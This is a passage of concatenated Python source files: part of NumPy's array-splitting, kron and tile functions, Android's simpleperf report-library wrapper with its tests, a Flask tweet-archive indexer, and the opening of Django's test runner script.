[12., 13., 14., 15.]])
>>> np.vsplit(x, 2)
[array([[0., 1., 2., 3.],
[4., 5., 6., 7.]]), array([[ 8., 9., 10., 11.],
[12., 13., 14., 15.]])]
>>> np.vsplit(x, np.array([3, 6]))
[array([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.]]), array([[12., 13., 14., 15.]]), array([], shape=(0, 4), dtype=float64)]
With a higher dimensional array the split is still along the first axis.
>>> x = np.arange(8.0).reshape(2, 2, 2)
>>> x
array([[[0., 1.],
[2., 3.]],
[[4., 5.],
[6., 7.]]])
>>> np.vsplit(x, 2)
[array([[[0., 1.],
[2., 3.]]]), array([[[4., 5.],
[6., 7.]]])]
"""
if _nx.ndim(ary) < 2:
raise ValueError('vsplit only works on arrays of 2 or more dimensions')
return split(ary, indices_or_sections, 0)
@array_function_dispatch(_hvdsplit_dispatcher)
def dsplit(ary, indices_or_sections):
"""
Split array into multiple sub-arrays along the 3rd axis (depth).
Please refer to the `split` documentation. `dsplit` is equivalent
to `split` with ``axis=2``, the array is always split along the third
axis provided the array dimension is greater than or equal to 3.
See Also
--------
split : Split an array into multiple sub-arrays of equal size.
Examples
--------
>>> x = np.arange(16.0).reshape(2, 2, 4)
>>> x
array([[[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.]],
[[ 8., 9., 10., 11.],
[12., 13., 14., 15.]]])
>>> np.dsplit(x, 2)
[array([[[ 0., 1.],
[ 4., 5.]],
[[ 8., 9.],
[12., 13.]]]), array([[[ 2., 3.],
[ 6., 7.]],
[[10., 11.],
[14., 15.]]])]
>>> np.dsplit(x, np.array([3, 6]))
[array([[[ 0., 1., 2.],
[ 4., 5., 6.]],
[[ 8., 9., 10.],
[12., 13., 14.]]]),
array([[[ 3.],
[ 7.]],
[[11.],
[15.]]]),
array([], shape=(2, 2, 0), dtype=float64)]
"""
if _nx.ndim(ary) < 3:
raise ValueError('dsplit only works on arrays of 3 or more dimensions')
return split(ary, indices_or_sections, 2)
def get_array_prepare(*args):
"""Find the wrapper for the array with the highest priority.
In case of ties, leftmost wins. If no wrapper is found, return None
"""
wrappers = sorted((getattr(x, '__array_priority__', 0), -i,
x.__array_prepare__) for i, x in enumerate(args)
if hasattr(x, '__array_prepare__'))
if wrappers:
return wrappers[-1][-1]
return None
def get_array_wrap(*args):
"""Find the wrapper for the array with the highest priority.
In case of ties, leftmost wins. If no wrapper is found, return None
"""
wrappers = sorted((getattr(x, '__array_priority__', 0), -i,
x.__array_wrap__) for i, x in enumerate(args)
if hasattr(x, '__array_wrap__'))
if wrappers:
return wrappers[-1][-1]
return None
def _kron_dispatcher(a, b):
return (a, b)
@array_function_dispatch(_kron_dispatcher)
def kron(a, b):
"""
Kronecker product of two arrays.
Computes the Kronecker product, a composite array made of blocks of the
second array scaled by the first.
Parameters
----------
a, b : array_like
Returns
-------
out : ndarray
See Also
--------
outer : The outer product
Notes
-----
The function assumes that the number of dimensions of `a` and `b`
are the same, if necessary prepending the smallest with ones.
If ``a.shape = (r0,r1,..,rN)`` and ``b.shape = (s0,s1,...,sN)``,
the Kronecker product has shape ``(r0*s0, r1*s1, ..., rN*SN)``.
The elements are products of elements from `a` and `b`, organized
explicitly by::
kron(a,b)[k0,k1,...,kN] = a[i0,i1,...,iN] * b[j0,j1,...,jN]
where::
kt = it * st + jt, t = 0,...,N
In the common 2-D case (N=1), the block structure can be visualized::
[[ a[0,0]*b, a[0,1]*b, ... , a[0,-1]*b ],
[ ... ... ],
[ a[-1,0]*b, a[-1,1]*b, ... , a[-1,-1]*b ]]
Examples
--------
>>> np.kron([1,10,100], [5,6,7])
array([ 5, 6, 7, ..., 500, 600, 700])
>>> np.kron([5,6,7], [1,10,100])
array([ 5, 50, 500, ..., 7, 70, 700])
>>> np.kron(np.eye(2), np.ones((2,2)))
array([[1., 1., 0., 0.],
[1., 1., 0., 0.],
[0., 0., 1., 1.],
[0., 0., 1., 1.]])
>>> a = np.arange(100).reshape((2,5,2,5))
>>> b = np.arange(24).reshape((2,3,4))
>>> c = np.kron(a,b)
>>> c.shape
(2, 10, 6, 20)
>>> I = (1,3,0,2)
>>> J = (0,2,1)
>>> J1 = (0,) + J # extend to ndim=4
>>> S1 = (1,) + b.shape
>>> K = tuple(np.array(I) * np.array(S1) + np.array(J1))
>>> c[K] == a[I]*b[J]
True
"""
b = asanyarray(b)
a = array(a, copy=False, subok=True, ndmin=b.ndim)
ndb, nda = b.ndim, a.ndim
if (nda == 0 or ndb == 0):
return _nx.multiply(a, b)
as_ = a.shape
bs = b.shape
if not a.flags.contiguous:
a = reshape(a, as_)
if not b.flags.contiguous:
b = reshape(b, bs)
nd = ndb
if (ndb != nda):
if (ndb > nda):
as_ = (1,)*(ndb-nda) + as_
else:
bs = (1,)*(nda-ndb) + bs
nd = nda
result = outer(a, b).reshape(as_+bs)
axis = nd-1
for _ in range(nd):
result = concatenate(result, axis=axis)
wrapper = get_array_prepare(a, b)
if wrapper is not None:
result = wrapper(result)
wrapper = get_array_wrap(a, b)
if wrapper is not None:
result = wrapper(result)
return result
def _tile_dispatcher(A, reps):
return (A, reps)
@array_function_dispatch(_tile_dispatcher)
def tile(A, reps):
"""
Construct an array by repeating A the number of times given by reps.
If `reps` has length ``d``, the result will have dimension of
``max(d, A.ndim)``.
If ``A.ndim < d``, `A` is promoted to be d-dimensional by prepending new
axes. So a shape (3,) array is promoted to (1, 3) for 2-D replication,
or shape (1, 1, 3) for 3-D replication. If this is not the desired
behavior, promote `A` to d-dimensions manually before calling this
function.
If ``A.ndim > d``, `reps` is promoted to `A`.ndim by pre-pending 1's to it.
Thus for an `A` of shape (2, 3, 4, 5), a `reps` of (2, 2) is treated as
(1, 1, 2, 2).
Note : Although tile may be used for broadcasting, it is strongly
recommended to use numpy's broadcasting operations and functions.
Parameters
----------
A : array_like
The input array.
reps : array_like
The number of repetitions of `A` along each axis.
Returns
-------
c : ndarray
The tiled output array.
See Also
--------
repeat : Repeat elements of an array.
broadcast_to : Broadcast an array to a new shape
Examples
--------
>>> a = np.array([0, 1, 2])
>>> np.tile(a, 2)
array([0, 1, 2, 0, 1, 2])
>>> np.tile(a, (2, 2))
array([[0, 1, 2, 0, 1, 2],
[0, 1, 2, 0, 1, 2]])
>>> np.tile(a, (2, 1, 2))
array([[[0, 1, 2, 0, 1, 2]],
[[0, 1, 2, 0, 1, 2]]])
>>> b = np.array([[1, 2], [3, 4]])
>>> np.tile(b, 2)
array([[1, 2, 1, 2],
[3, 4, 3, 4]])
>>> np.tile(b, (2, 1))
array([[1, 2],
[3, 4],
[1, 2],
[3, 4]])
>>> c = np.array([1,2,3,4])
>>> np.tile(c,(4,1))
array([[1, 2, 3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4]])
"""
try:
tup = tuple(reps)
except TypeError:
tup = (reps,)
d = len(tup)
if all(x == 1 for x in tup) and isinstance(A, _nx.ndarray):
# Fixes the problem that the function does not make a copy if A is a
# numpy array and the repetitions are 1 in all dimensions
return _nx.array(A, copy=True, subok=True, ndmin=d)
else:
# Note that no copy of zero-sized arrays is made. However since they
# have no data there is no risk of an inadvertent overwrite.
c = _nx.array(A, copy=False, subok=True, ndmin=d)
if (d < c.ndim):
tup = (1,)*(c.ndim-d) + tup
shape_out = tuple(s*t for s, t in zip(c.shape, tup))
n = c.size
if n > 0:
for dim_in, nrep in zip(c.shape, tup):
if nrep != 1:
c = c.reshape(-1, n).repeat(nrep, 0)
n //= dim_in
return c.reshape(shape_out)
|
|
#!/usr/bin/env python
#
# Copyright (C) 2016 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""simpleperf_report_lib.py: a python wrapper of libsimpleperf_report.so.
Used to access samples in perf.data.
"""
import ctypes as ct
import os
import subprocess
import sys
import unittest
from utils import *
def _get_native_lib():
return get_host_binary_path('libsimpleperf_report.so')
def _is_null(p):
return ct.cast(p, ct.c_void_p).value is None
def _char_pt(str):
if sys.version_info < (3, 0):
return str
# In python 3, str are wide strings whereas the C api expects 8 bit strings, hence we have to convert
# For now using utf-8 as the encoding.
return str.encode('utf-8')
def _char_pt_to_str(char_pt):
if sys.version_info < (3, 0):
return char_pt
return char_pt.decode('utf-8')
class SampleStruct(ct.Structure):
_fields_ = [('ip', ct.c_uint64),
('pid', ct.c_uint32),
('tid', ct.c_uint32),
('thread_comm', ct.c_char_p),
('time', ct.c_uint64),
('in_kernel', ct.c_uint32),
('cpu', ct.c_uint32),
('period', ct.c_uint64)]
class EventStruct(ct.Structure):
_fields_ = [('name', ct.c_char_p)]
class SymbolStruct(ct.Structure):
_fields_ = [('dso_name', ct.c_char_p),
('vaddr_in_file', ct.c_uint64),
('symbol_name', ct.c_char_p),
('symbol_addr', ct.c_uint64)]
class CallChainEntryStructure(ct.Structure):
_fields_ = [('ip', ct.c_uint64),
('symbol', SymbolStruct)]
class CallChainStructure(ct.Structure):
_fields_ = [('nr', ct.c_uint32),
('entries', ct.POINTER(CallChainEntryStructure))]
# convert char_p to str for python3.
class SampleStructUsingStr(object):
def __init__(self, sample):
self.ip = sample.ip
self.pid = sample.pid
self.tid = sample.tid
self.thread_comm = _char_pt_to_str(sample.thread_comm)
self.time = sample.time
self.in_kernel = sample.in_kernel
self.cpu = sample.cpu
self.period = sample.period
class EventStructUsingStr(object):
def __init__(self, event):
self.name = _char_pt_to_str(event.name)
class SymbolStructUsingStr(object):
def __init__(self, symbol):
self.dso_name = _char_pt_to_str(symbol.dso_name)
self.vaddr_in_file = symbol.vaddr_in_file
self.symbol_name = _char_pt_to_str(symbol.symbol_name)
self.symbol_addr = symbol.symbol_addr
class CallChainEntryStructureUsingStr(object):
def __init__(self, entry):
self.ip = entry.ip
self.symbol = SymbolStructUsingStr(entry.symbol)
class CallChainStructureUsingStr(object):
def __init__(self, callchain):
self.nr = callchain.nr
self.entries = []
for i in range(self.nr):
self.entries.append(CallChainEntryStructureUsingStr(callchain.entries[i]))
class ReportLibStructure(ct.Structure):
_fields_ = []
class ReportLib(object):
def __init__(self, native_lib_path=None):
if native_lib_path is None:
native_lib_path = _get_native_lib()
self._load_dependent_lib()
self._lib = ct.CDLL(native_lib_path)
self._CreateReportLibFunc = self._lib.CreateReportLib
self._CreateReportLibFunc.restype = ct.POINTER(ReportLibStructure)
self._DestroyReportLibFunc = self._lib.DestroyReportLib
self._SetLogSeverityFunc = self._lib.SetLogSeverity
self._SetSymfsFunc = self._lib.SetSymfs
self._SetRecordFileFunc = self._lib.SetRecordFile
self._SetKallsymsFileFunc = self._lib.SetKallsymsFile
self._ShowIpForUnknownSymbolFunc = self._lib.ShowIpForUnknownSymbol
self._GetNextSampleFunc = self._lib.GetNextSample
self._GetNextSampleFunc.restype = ct.POINTER(SampleStruct)
self._GetEventOfCurrentSampleFunc = self._lib.GetEventOfCurrentSample
self._GetEventOfCurrentSampleFunc.restype = ct.POINTER(EventStruct)
self._GetSymbolOfCurrentSampleFunc = self._lib.GetSymbolOfCurrentSample
self._GetSymbolOfCurrentSampleFunc.restype = ct.POINTER(SymbolStruct)
self._GetCallChainOfCurrentSampleFunc = self._lib.GetCallChainOfCurrentSample
self._GetCallChainOfCurrentSampleFunc.restype = ct.POINTER(
CallChainStructure)
self._GetBuildIdForPathFunc = self._lib.GetBuildIdForPath
self._GetBuildIdForPathFunc.restype = ct.c_char_p
self._instance = self._CreateReportLibFunc()
assert(not _is_null(self._instance))
self.convert_to_str = (sys.version_info >= (3, 0))
def _load_dependent_lib(self):
# As the windows dll is built with mingw we need to also find "libwinpthread-1.dll".
# Load it before libsimpleperf_report.dll if it does exist in the same folder as this script.
if is_windows():
libwinpthread_path = os.path.join(get_script_dir(), "libwinpthread-1.dll")
if os.path.exists(libwinpthread_path):
self._libwinpthread = ct.CDLL(libwinpthread_path)
else:
log_fatal('%s is missing' % libwinpthread_path)
def Close(self):
if self._instance is None:
return
self._DestroyReportLibFunc(self._instance)
self._instance = None
def SetLogSeverity(self, log_level='info'):
""" Set log severity of native lib, can be verbose,debug,info,error,fatal."""
cond = self._SetLogSeverityFunc(self.getInstance(), _char_pt(log_level))
self._check(cond, "Failed to set log level")
def SetSymfs(self, symfs_dir):
""" Set directory used to find symbols."""
cond = self._SetSymfsFunc(self.getInstance(), _char_pt(symfs_dir))
self._check(cond, "Failed to set symbols directory")
def SetRecordFile(self, record_file):
""" Set the path of record file, like perf.data."""
cond = self._SetRecordFileFunc(self.getInstance(), _char_pt(record_file))
self._check(cond, "Failed to set record file")
def ShowIpForUnknownSymbol(self):
self._ShowIpForUnknownSymbolFunc(self.getInstance())
def SetKallsymsFile(self, kallsym_file):
""" Set the file path to a copy of the /proc/kallsyms file (for off device decoding) """
cond = self._SetKallsymsFileFunc(self.getInstance(), _char_pt(kallsym_file))
self._check(cond, "Failed to set kallsyms file")
def GetNextSample(self):
sample = self._GetNextSampleFunc(self.getInstance())
if _is_null(sample):
return None
if self.convert_to_str:
return SampleStructUsingStr(sample[0])
return sample[0]
def GetEventOfCurrentSample(self):
event = self._GetEventOfCurrentSampleFunc(self.getInstance())
assert(not _is_null(event))
if self.convert_to_str:
return EventStructUsingStr(event[0])
return event[0]
def GetSymbolOfCurrentSample(self):
symbol = self._GetSymbolOfCurrentSampleFunc(self.getInstance())
assert(not _is_null(symbol))
if self.convert_to_str:
return SymbolStructUsingStr(symbol[0])
return symbol[0]
def GetCallChainOfCurrentSample(self):
callchain = self._GetCallChainOfCurrentSampleFunc(self.getInstance())
assert(not _is_null(callchain))
if self.convert_to_str:
return CallChainStructureUsingStr(callchain[0])
return callchain[0]
def GetBuildIdForPath(self, path):
build_id = self._GetBuildIdForPathFunc(self.getInstance(), _char_pt(path))
assert(not _is_null(build_id))
return _char_pt_to_str(build_id)
def getInstance(self):
if self._instance is None:
raise Exception("Instance is Closed")
return self._instance
def _check(self, cond, failmsg):
if not cond:
raise Exception(failmsg)
class TestReportLib(unittest.TestCase):
def setUp(self):
self.perf_data_path = os.path.join(os.path.dirname(get_script_dir()),
'testdata', 'perf_with_symbols.data')
if not os.path.isfile(self.perf_data_path):
raise Exception("can't find perf_data at %s" % self.perf_data_path)
self.report_lib = ReportLib()
self.report_lib.SetRecordFile(self.perf_data_path)
def tearDown(self):
self.report_lib.Close()
def test_build_id(self):
build_id = self.report_lib.GetBuildIdForPath('/data/t2')
self.assertEqual(build_id, '0x70f1fe24500fc8b0d9eb477199ca1ca21acca4de')
def test_symbol_addr(self):
found_func2 = False
while True:
sample = self.report_lib.GetNextSample()
if sample is None:
break
symbol = self.report_lib.GetSymbolOfCurrentSample()
if symbol.symbol_name == 'func2(int, int)':
found_func2 = True
self.assertEqual(symbol.symbol_addr, 0x4004ed)
self.assertTrue(found_func2)
def test_sample(self):
found_sample = False
while True:
sample = self.report_lib.GetNextSample()
if sample is None:
break
if sample.ip == 0x4004ff and sample.time == 7637889424953:
found_sample = True
self.assertEqual(sample.pid, 15926)
self.assertEqual(sample.tid, 15926)
self.assertEqual(sample.thread_comm, 't2')
self.assertEqual(sample.cpu, 5)
self.assertEqual(sample.period, 694614)
event = self.report_lib.GetEventOfCurrentSample()
self.assertEqual(event.name, 'cpu-cycles')
callchain = self.report_lib.GetCallChainOfCurrentSample()
self.assertEqual(callchain.nr, 0)
self.assertTrue(found_sample)
def main():
test_all = True
if len(sys.argv) > 1 and sys.argv[1] == '--test-one':
test_all = False
del sys.argv[1]
if test_all:
subprocess.check_call(['python', os.path.realpath(__file__), '--test-one'])
subprocess.check_call(['python3', os.path.realpath(__file__), '--test-one'])
else:
sys.exit(unittest.main())
if __name__ == '__main__':
main()
|
|
# -*- coding: utf-8 -*-
import os, glob, sys, json
workdir = os.curdir
try:
workdir = os.path.dirname(__file__)
except: pass
from flask import Flask
from flaskext.genshi import Genshi, render_template
from genshi.template import MarkupTemplate
from genshi.template import TemplateLoader
from genshi import Stream
from genshi.input import XML
from genshi.core import QName
import os.path
import logging
import config
import datetime, dateutil.parser
import pytz
import re
app = Flask(__name__)
genshi = Genshi(app)
def flatten(lst):
for elem in lst:
if type(elem) in (list,):
for i in flatten(elem):
yield i
else:
yield elem
def has_photo(tweet):
return (
(tweet.has_key('entities')
and tweet['entities'].has_key('media')
and True in [ m.has_key('type') and m['type'] == 'photo' for m in tweet['entities']['media'] ])
or
(tweet.has_key('retweeted_status')
and tweet['retweeted_status'].has_key('entities')
and tweet['retweeted_status']['entities'].has_key('media')
and True in [ m.has_key('type') and m['type'] == 'photo' for m in tweet['retweeted_status']['entities']['media'] ])
or
(tweet.has_key('retweeted_status')
and tweet['retweeted_status'].has_key('extended_entities')
and tweet['retweeted_status']['extended_entities'].has_key('media')
and True in [ m.has_key('type') and m['type'] == 'photo' for m in tweet['retweeted_status']['extended_entities']['media'] ])
or
(tweet.has_key('retweeted_status')
and tweet['retweeted_status'].has_key('extended_tweet')
and tweet['retweeted_status']['extended_tweet'].has_key('entities')
and tweet['retweeted_status']['extended_tweet']['entities'].has_key('media')
and True in [ m.has_key('type') and m['type'] == 'photo' for m in tweet['retweeted_status']['extended_tweet']['entities']['media'] ])
or
(tweet.has_key('retweeted_status')
and tweet['retweeted_status'].has_key('extended_tweet')
and tweet['retweeted_status']['extended_tweet'].has_key('extended_entities')
and tweet['retweeted_status']['extended_tweet']['extended_entities'].has_key('media')
and True in [ m.has_key('type') and m['type'] == 'photo' for m in tweet['retweeted_status']['extended_tweet']['extended_entities']['media'] ])
)
def update_index():
index_file = os.path.join(config.archive_dir, 'archiveindex.json')
idx = {
'last_seen': '0',
'tweets': {},
}
try:
with open(index_file, 'r') as fp:
idx = json.load(fp)
except:
pass
archive_dirs = sorted([ f for f in glob.glob(os.path.join(config.archive_dir, '[0-9]*')) if os.path.isdir(f) and os.path.basename(f) >= idx['last_seen'] ])
for dir in archive_dirs:
for jsonfile in sorted(glob.glob(os.path.join(dir, '*.json'))):
with open(jsonfile) as f:
tweet = json.load(f)
if ((not config.show_only_photos_in_archive) or has_photo(tweet) ):
if not any(word in tweet['text'].lower() for word in config.spamfilter_word_blacklist): # Blacklisted words?
tweettime = dateutil.parser.parse(tweet['created_at']).astimezone(pytz.timezone('Europe/Berlin'))
if config.paginate_by_day:
year = str(tweettime.year)
month = "%02d" % tweettime.month
day = "%02d" % tweettime.day
if not idx['tweets'].has_key(year):
idx['tweets'][year] = {}
if not idx['tweets'][year].has_key(month):
idx['tweets'][year][month] = {}
if not idx['tweets'][year][month].has_key(day):
idx['tweets'][year][month][day] = []
if not tweet['id_str'] in idx['tweets'][year][month][day]:
idx['tweets'][year][month][day].append(tweet['id_str'])
else:
(year, kw, day) = [ str(x) for x in tweettime.isocalendar() ]
# Can we put the tweet into the correct KW by checking whether the previous, next or current KW is mentioned in the tweet?
maxdelta = datetime.timedelta(days=6)
for (y,k,d) in [ ts.isocalendar() for ts in (tweettime - maxdelta, tweettime + maxdelta, tweettime)]:
if re.search(r"(^|\D)%d(\D|$)" % k, tweet['text']):
kw = str(k)
if not idx['tweets'].has_key(year):
idx['tweets'][year] = {}
if not idx['tweets'][year].has_key(kw):
idx['tweets'][year][kw] = []
if not tweet['id_str'] in idx['tweets'][year][kw]:
idx['tweets'][year][kw].append(tweet['id_str'])
idx['last_seen'] = os.path.basename(archive_dirs[-1])
with open(index_file + '.new', 'w') as fp:
json.dump(idx, fp)
if os.path.isfile(index_file + '.new'):
os.rename(index_file + '.new', index_file)
return idx
def insensitive(pattern):
def either(c):
return '[%s%s]'%(c.lower(),c.upper()) if c.isalpha() else c
return ''.join(map(either,pattern))
def update_user_index(screenname):
user_archive_dir = os.path.join(config.archive_dir, 'users')
try:
os.makedirs(user_archive_dir)
except: pass
index_file = os.path.join(user_archive_dir, '%s.json' % screenname)
idx = {
'last_seen': '0',
'tweets': [],
}
try:
with open(index_file, 'r') as fp:
idx = json.load(fp)
except:
pass
archive_dirs = sorted([ f for f in glob.glob(os.path.join(config.archive_dir, '[0-9]*')) if os.path.isdir(f) and os.path.basename(f) >= idx['last_seen'] ])
for dir in archive_dirs:
for jsonfile in sorted(glob.glob(os.path.join(dir, '*-'+insensitive(screenname)+'.json'))):
with open(jsonfile) as f:
tweet = json.load(f)
if (not config.show_only_photos_in_archive) or has_photo(tweet):
if tweet['user']['screen_name'].lower() == screenname or (tweet.has_key('retweeted_status') and tweet['retweeted_status']['user']['screen_name'].lower() == screenname):
if not any(word in tweet['text'].lower() for word in config.spamfilter_word_blacklist): # Blacklisted words?
if not tweet['id_str'] in idx['tweets']:
idx['tweets'].append(tweet['id_str'])
if len(idx['tweets']) > 0:
idx['last_seen'] = os.path.basename(archive_dirs[-1])
with open(index_file + '.new', 'w') as fp:
json.dump(idx, fp)
if os.path.isfile(index_file + '.new'):
os.rename(index_file + '.new', index_file)
return idx
def update_user_tweetindex(screenname):
user_archive_dir = os.path.join(config.archive_dir, 'users')
try:
os.makedirs(user_archive_dir)
except: pass
index_file = os.path.join(user_archive_dir, '%s.full.json' % screenname)
idx = {
'last_seen': '0',
'tweets': [],
}
try:
with open(index_file, 'r') as fp:
idx = json.load(fp)
except:
pass
archive_dirs = sorted([ f for f in glob.glob(os.path.join(config.archive_dir, '[0-9]*')) if os.path.isdir(f) and os.path.basename(f) >= idx['last_seen'] ])
for dir in archive_dirs:
for jsonfile in sorted(glob.glob(os.path.join(dir, '*-'+insensitive(screenname)+'.json'))):
with open(jsonfile) as f:
tweet = json.load(f)
if has_photo(tweet):
if tweet['user']['screen_name'].lower() == screenname or (tweet.has_key('retweeted_status') and tweet['retweeted_status']['user']['screen_name'].lower() == screenname):
if not tweet['id_str'] in idx['tweets']:
idx['tweets'].append(tweet)
if len(idx['tweets']) > 0:
idx['last_seen'] = os.path.basename(archive_dirs[-1])
with open(index_file + '.new', 'w') as fp:
json.dump(idx, fp)
if os.path.isfile(index_file + '.new'):
os.rename(index_file + '.new', index_file)
return idx
@app.route('/user/<screenname>')
def user(screenname):
screenname = re.sub(r'[^a-z0-9_]+', '', screenname.lower())
idx = update_user_index(screenname)
return render_template(
'index.html',
{
'screenname': screenname,
'title': config.track,
'tweetids': json.dumps(sorted(idx['tweets'], reverse=False)),
});
@app.route('/collage/<screenname>')
def collage(screenname):
screenname = re.sub(r'[^a-z0-9_]+', '', screenname.lower())
idx = update_user_tweetindex(screenname)
return render_template(
'collage.html',
{
'screenname': screenname,
'title': config.track,
'tweetids': json.dumps(sorted(idx['tweets'])),
});
@app.route('/')
@app.route('/<year>/<kw>')
def index(year=None, kw=None):
if config.paginate_by_day:
return index_days()
tweetids = []
idx = {}
try:
year = str(int(year))
kw = str(int(kw))
except:
year = None
kw = None
if year is None:
(year, kw, day) = [ str(x) for x in datetime.datetime.now().isocalendar() ]
try:
idx = update_index()
tweetids = list(idx['tweets'][year][kw])
except Exception as e:
print e
return render_template(
'index.html',
{ 'year':year,
'kw':kw,
'title': config.track,
'navigation': sorted(set(flatten([ [ (y, k) for k in idx['tweets'][y].keys() ] for y in idx['tweets'].keys() ])), key=lambda x: int(x[1])),
'tweetids': json.dumps(tweetids),
});
@app.route('/<year>/<month>/<day>')
def index_days(year=None, month=None, day=None):
tweetids = []
idx = {}
try:
year = str(int(year))
month = "%02d" % int(month)
day = "%02d" % int(day)
except:
year = None
month = None
day = None
if year is None:
now = datetime.datetime.now()
year = str(now.year)
month = "%02d" % now.month
day = "%02d" % now.day
try:
idx = update_index()
tweetids = list(idx['tweets'][year][month][day])
except Exception as e:
print e
return render_template(
'index.html',
{ 'year':year,
'month': month,
'day': day,
'title': config.track,
'navigation': sorted(flatten([ [ [ (y, m, d) for d in idx['tweets'][y][m].keys() ] for m in idx['tweets'][y].keys() ] for y in idx['tweets'].keys() ])),
'tweetids': json.dumps(tweetids),
});
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)
|
|
#!/usr/bin/env python
import argparse
import atexit
import copy
import os
import shutil
import socket
import subprocess
import sys
import tempfile
import warnings
try:
import django
except ImportError as e:
raise RuntimeError(
'Django module not found, reference tests/README.rst for instructions.'
) from e
else:
from django.apps import apps
from django.conf import settings
from django.db import connection, connections
from django.test import TestCase, TransactionTestCase
from django.test.runner import default_test_processes
from django.test.selenium import SeleniumTestCaseBase
from django.test.utils import get_runner
from django.utils.deprecation import (
RemovedInDjango40Warning, RemovedInDjango41Warning,
)
from django.utils.log import DEFAULT_LOGGING
from django.utils.version import PY37
try:
import MySQLdb
except ImportError:
pass
else:
# Ignore informational warnings from QuerySet.explain().
warnings.filterwarnings('ignore', r'\(1003, *', category=MySQLdb.Warning)
# Make deprecation warnings errors to ensure no usage of deprecated features.
warnings.simplefilter("error", RemovedInDjango40Warning)
warnings.simplefilter('error', RemovedInDjango41Warning)
# Make resource and runtime warning errors to ensure no usage of error prone
# patterns.
warnings.simplefilter("error", ResourceWarning)
warnings.simplefilter("error", RuntimeWarning)
# Ignore known warnings in test dependencies.
warnings.filterwarnings("ignore", "'U' mode is deprecated", DeprecationWarning, module='docutils.io')
RUNTESTS_DIR = os.path.abspath(os.path.dirname(__file__))
TEMPLATE_DIR = os.path.join(RUNTESTS_DIR, 'templates')
# Create a specific subdirectory for the duration of the test suite.
TMPDIR = tempfile.mkdtemp(prefix='django_')
# Set the TMPDIR environment variable in addition to tempfile.tempdir
# so that children processes inherit it.
tempfile.tempdir = os.environ['TMPDIR'] = TMPDIR
# Removing the temporary TMPDIR.
atexit.register(shutil.rmtree, TMPDIR)
SUBDIRS_TO_SKIP = [
'data',
'import_error_package',
'test_runner_apps',
]
ALWAYS_INSTALLED_APPS = [
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sites',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.admin.apps.SimpleAdminConfig',
'django.contrib.staticfiles',
]
ALWAYS_MIDDLEWARE = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
]
# Need to add the associated contrib app to INSTALLED_APPS in some cases to
# avoid "RuntimeError: Model class X doesn't declare an explicit app_label
# and isn't in an application in INSTALLED_APPS."
CONTRIB_TESTS_TO_APPS = {
'flatpages_tests': 'django.contrib.flatpages',
'redirects_tests': 'django.contrib.redirects',
}
def get_test_modules():
modules = []
discovery_paths = [(None, RUNTESTS_DIR)]
if connection.features.gis_enabled:
# GIS tests are in nested apps
discovery_paths.append(('gis_tests', os.path.join(RUNTESTS_DIR, 'gis_tests')))
else:
SUBDIRS_TO_SKIP.append('gis_tests')
for modpath, dirpath in discovery_paths:
for f in os.scandir(dirpath):
if ('.' not in f.name and
os.path.basename(f.name) not in SUBDIRS_TO_SKIP and
not f.is_file() and
os.path.exists(os.path.join(f.path, '__init__.py'))):
modules.append((modpath, f.name))
return modules
def get_installed():
return [app_config.name for app_config in apps.get_app_configs()]
def setup(verbosity, test_labels, parallel, start_at, start_after):
# Reduce the given test labels to just the app module path.
test_labels_set = set()
for label in test_labels:
bits = label.split('.')[:1]
test_labels_set.add('.'.join(bits))
if verbosity >= 1:
msg = "Testing against Django installed in '%s'" % os.path.dirname(django.__file__)
max_parallel = default_test_processes() if parallel == 0 else parallel
if max_parallel > 1:
msg += " with up to %d processes" % max_parallel
print(msg)
# Force declaring available_apps in TransactionTestCase for faster tests.
def no_available_apps(self):
raise Exception("Please define available_apps in TransactionTestCase "
"and its subclasses.")
TransactionTestCase.available_apps = property(no_available_apps)
TestCase.available_apps = None
state = {
'INSTALLED_APPS': settings.INSTALLED_APPS,
'ROOT_URLCONF': getattr(settings, "ROOT_URLCONF", ""),
'TEMPLATES': settings.TEMPLATES,
'LANGUAGE_CODE': settings.LANGUAGE_CODE,
'STATIC_URL': settings.STATIC_URL,
'STATIC_ROOT': settings.STATIC_ROOT,
'MIDDLEWARE': settings.MIDDLEWARE,
}
# Redirect some settings for the duration of these tests.
settings.INSTALLED_APPS = ALWAYS_INSTALLED_APPS
settings.ROOT_URLCONF = 'urls'
settings.STATIC_URL = '/static/'
settings.STATIC_ROOT = os.path.join(TMPDIR, 'static')
settings.TEMPLATES = [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
}]
settings.LANGUAGE_CODE = 'en'
settings.SITE_ID = 1
settings.MIDDLEWARE = ALWAYS_MIDDLEWARE
settings.MIGRATION_MODULES = {
# This lets us skip creating migrations for the test models as many of
# them depend on one of the following contrib applications.
'auth': None,
'contenttypes': None,
'sessions': None,
}
log_config = copy.deepcopy(DEFAULT_LOGGING)
# Filter out non-error logging so we don't have to capture it in lots of
# tests.
log_config['loggers']['django']['level'] = 'ERROR'
settings.LOGGING = log_config
settings.SILENCED_SYSTEM_CHECKS = [
'fields.W342', # ForeignKey(unique=True) -> OneToOneField
'fields.W903', # NullBooleanField deprecated.
]
# Load all the ALWAYS_INSTALLED_APPS.
django.setup()
# It would be nice to put this validation earlier but it must come after
# django.setup() so that connection.features.gis_enabled can be accessed
# without raising AppRegistryNotReady when running gis_tests in isolation
# on some backends (e.g. PostGIS).
if 'gis_tests' in test_labels_set and not connection.features.gis_enabled:
